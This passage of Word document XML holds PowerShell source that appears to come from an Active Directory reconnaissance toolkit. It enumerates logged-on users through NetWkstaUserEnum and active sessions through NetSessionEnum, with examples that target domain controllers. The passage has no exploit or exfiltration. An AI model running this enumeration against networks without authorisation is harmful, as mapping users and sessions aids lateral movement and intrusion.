        <w:t xml:space="preserve">    $PtrInfo = [IntPtr]::Zero</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E04F264" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    $EntriesRead = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ED3B1A1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $TotalRead = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A525C62" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $ResumeHandle = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54AEEED9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="560DCD1A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    # get logged on user information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A824937" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $Result = $Netapi32::NetWkstaUserEnum($Computer, $QueryLevel, [ref]$PtrInfo, -1, [ref]$EntriesRead, [ref]$TotalRead, [ref]$ResumeHandle)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="233FBCF7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5F411E7B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    # Locate the offset of the initial intPtr</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="603B2AD9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $Offset = $PtrInfo.ToInt64()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E7C2B0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4E24BD71" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    # 0 = success</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72847A47" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    if (($Result -eq 0) -and ($Offset -gt 0)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F53FB04" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="33D1A0CB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        # Work out how much to increment the pointer by finding out the size of the structure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C126B82" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Increment = $WKSTA_USER_INFO_1::GetSize()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B312F3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="25EABB03" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        # parse all the result structures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3915278D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        for ($i = 0; ($i -lt $EntriesRead); $i++) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B9B0E4E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            # create a new int ptr at the given offset and cast the pointer as our result structure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0680CE7C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $NewIntPtr = New-Object System.Intptr -ArgumentList $Offset</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="167E202D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $Info = $NewIntPtr -as $WKSTA_USER_INFO_1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FA50981" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="796A8BAD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            # return all the sections of the structure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="077D68C2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $LoggedOn = $Info | Select-Object *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71288628" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $LoggedOn | Add-Member Noteproperty 'ComputerName' $Computer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AAFA8C3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $Offset = $NewIntPtr.ToInt64()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FEA20F8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $Offset += $Increment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53FFCC05" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $LoggedOn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1742B476" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7511C1C5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="45439788" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        # free up the result buffer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D1904B6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Null = $Netapi32::NetApiBufferFree($PtrInfo)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53D69ED2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B97BCEC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37379362" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Write-Verbose "Error: $(([ComponentModel.Win32Exception] $Result).Message)"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A1DF4EF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A4A68F7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33A9940A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0BA101FA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3AD58C18" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>filter Get-NetSession {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D6C3801" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>&lt;#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BAD5C8D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .SYNOPSIS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34C44D10" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="69CD2F5C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        This function will execute the NetSessionEnum Win32API call to query</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F9EC05F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        a given host for active sessions on the host.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0847088E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Heavily adapted from dunedinite's post on stackoverflow (see LINK below)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="281FF5CC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6D254E27" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER ComputerName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B340D1A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="26E77DAE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The ComputerName to query for active sessions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19CD50E2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="74A4AB51" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER UserName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C4D2B9F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="678F73DC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The user name to filter for active sessions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="055CBDEE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="51EF025E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .OUTPUTS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="593A9EBF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="38E8F3FB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        SESSION_INFO_10 structure. A representation of the SESSION_INFO_10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BE4C1EB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        result structure which includes the host and username associated</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F03720" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        with active sessions, with the ComputerName added.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="277FAFE7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="688BEC55" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AF67AA7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3CCC4996" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Get-NetSession</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="042FCF12" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="39279545" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Returns active sessions on the local host.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E964697" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="261EF67C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CE2AE8B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6F4EC683" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Get-NetSession -ComputerName sqlserver</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C227C63" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="120AB1EB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Returns active sessions on the 'sqlserver' host.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F583094" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="354C7E0D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="528C7BDC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7278772B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Get-NetDomainController | Get-NetSession</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12809B12" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6AC9AB1F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Returns active sessions on all domain controllers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B6BD32" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5E850798" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .LINK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="308149A8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6AF37A09" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        http://www.powershellmagazine.com/2014/09/25/easily-defining-enums-structs-and-win32-functions-in-memory/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="199D9A77" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>#&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E3B8FFC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5E0F9EB2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    [CmdletBinding()]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1847FEF0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    param(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D0C02B9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Parameter(ValueFromPipeline=$True)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D13C42" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Alias('HostName')]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2601B401" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Object[]]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A633FF0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [ValidateNotNullOrEmpty()]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C98AF28" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $ComputerName = 'localhost',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48846A9F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1AFB2E7B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3132DA8F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $UserName = ''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F76A6F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CBAC691" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="046082E5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    # extract the computer name from whatever object was passed on the pipeline</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="058A32FB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $Computer = $ComputerName | Get-NameField</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D28BF8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="25507932" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    # arguments for NetSessionEnum</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B462D50" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $QueryLevel = 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E4507BD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $PtrInfo = [IntPtr]::Zero</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6946C7E8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $EntriesRead = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B6FFEFF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $TotalRead = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7296762B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $ResumeHandle = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1140414A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="69157C7C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    # get session information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7855A19F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $Result = $Netapi32::NetSessionEnum($Computer, '', $UserName, $QueryLevel, [ref]$PtrInfo, -1, [ref]$EntriesRead, [ref]$TotalRead, [ref]$ResumeHandle)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08264547" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3F3C79A7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    # Locate the offset of the initial intPtr</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E13D2BD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $Offset = $PtrInfo.ToInt64()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="298852AF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6DD8DBFD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    # 0 = success</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="337C5FA3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    if (($Result -eq 0) -and ($Offset -gt 0)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="456DCB41" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="201B4AB1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        # Work out how much to increment the pointer by finding out the size of the structure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="520D261E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Increment = $SESSION_INFO_10::GetSize()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D7C211E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7E0F5C07" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        # parse all the result structures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E4A7A78" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        for ($i = 0; ($i -lt $EntriesRead); $i++) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A49263B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            # create a new int ptr at the given offset and cast the pointer as our result structure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="634CA110" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $NewIntPtr = New-Object System.Intptr -ArgumentList $Offset</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DCBD7EE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $Info = $NewIntPtr -as $SESSION_INFO_10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60277543" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="64CA8732" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            # return all the sections of the structure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B16CAB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $Sessions = $Info | Select-Object *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A2BE5A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $Sessions | Add-Member Noteproperty 'ComputerName' $Computer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="536D618E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $Offset = $NewIntPtr.ToInt64()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26445CC7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $Offset += $Increment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A8101E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $Sessions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="757F0FDC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26905745" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        # free up the result buffer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A70BEB9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Null = $Netapi32::NetApiBufferFree($PtrInfo)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22516BB7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
